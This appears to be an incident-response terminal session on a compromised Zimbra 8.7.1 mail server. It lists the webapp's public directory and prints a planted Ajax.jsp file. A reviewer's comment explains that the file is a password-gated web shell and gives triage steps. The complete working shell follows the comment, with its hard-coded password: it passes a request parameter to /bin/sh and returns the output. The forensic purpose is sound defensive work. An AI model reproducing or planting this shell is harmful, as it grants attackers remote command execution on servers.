[zimbra@mail ~]$ zmcontrol -v
Release 8.7.1_GA_1670.RHEL7_64_20161025045328 RHEL7_64 FOSS edition.
[zimbra@mail ~]$
HTTP ERROR 404
Problem accessing /public/error.jsp. Reason:
/public/error.jsp
[zimbra@mail ~]$ lsof -i :443
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
nginx 2452 zimbra 10u IPv4 485342 0t0 TCP *:https (LISTEN)
nginx 2453 zimbra 10u IPv4 485342 0t0 TCP *:https (LISTEN)
nginx 2454 zimbra 10u IPv4 485342 0t0 TCP *:https (LISTEN)
nginx 2455 zimbra 10u IPv4 485342 0t0 TCP *:https (LISTEN)
[zimbra@mail ~]$
[root@mail log]# ls -l /opt/zimbra/jetty/webapps/zimbra/public/
total 52
-rw-rw-r-- 1 zimbra zimbra 1522 Jan 31 10:44 404.html
-rw-rw-r-- 1 zimbra zimbra 1534 Oct 25 2016 5xx.html
-rw-r----- 1 zimbra zimbra 332 Apr 12 21:08 Ajax.jsp
-rw-rw-r-- 1 zimbra zimbra 2789 Oct 25 2016 blankHistory.html
-rw-rw-r-- 1 zimbra zimbra 1389 Oct 25 2016 blank.html
-rw-rw-r-- 1 zimbra zimbra 2131 Oct 25 2016 empty.html
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10 2016 flash
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 jsp
-rw-rw-r-- 1 zimbra zimbra 2293 Oct 25 2016 launch.html
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 proto
drwxrwxr-x 3 zimbra zimbra 4096 Dec 10 2016 sounds
-rw-rw-r-- 1 zimbra zimbra 33 Jan 31 10:39 test.txt
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10 2016 tmp
[root@mail public]# cat Ajax.jsp
<%--
  NOTE(review): this file is a password-gated command-execution backdoor
  (JSP web shell). It does not look like part of the stock webapp; confirm
  against a clean install of the same release.

  What the scriptlet does:
    - Compares the request parameter "ppwd" with a hard-coded string; nothing
      runs unless they are equal.
    - Passes the request parameter "pcom" unmodified to `/bin/sh -c` through
      Runtime.exec().
    - Reads the child process's stdout in 2048-byte chunks and writes it back
      in the HTTP response between <pre> tags. stderr is not read.

  Effect: anyone who knows the hard-coded value can run shell commands with
  the privileges of the process serving this webapp (presumably the zimbra
  user; confirm on the host).

  Triage notes:
    - Preserve a copy of the file with its ownership, mode and timestamps
      before removing it.
    - request.getParameter() reads both the query string and form-encoded POST
      bodies, so access logs may show only the request path; search for every
      request to /public/Ajax.jsp, not just ones with visible parameters.
    - In the directory listing above, Ajax.jsp has the same mtime
      (Apr 12 21:08) as the jsp/ and proto/ directories; inspect those for
      further dropped files.
    - Deleting this file does not close whatever path was used to write it;
      treat the host and the credentials stored on it as compromised until
      the entry point is identified.
--%>
<%if("LVwpVsmayetL6cvL2YTonwYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>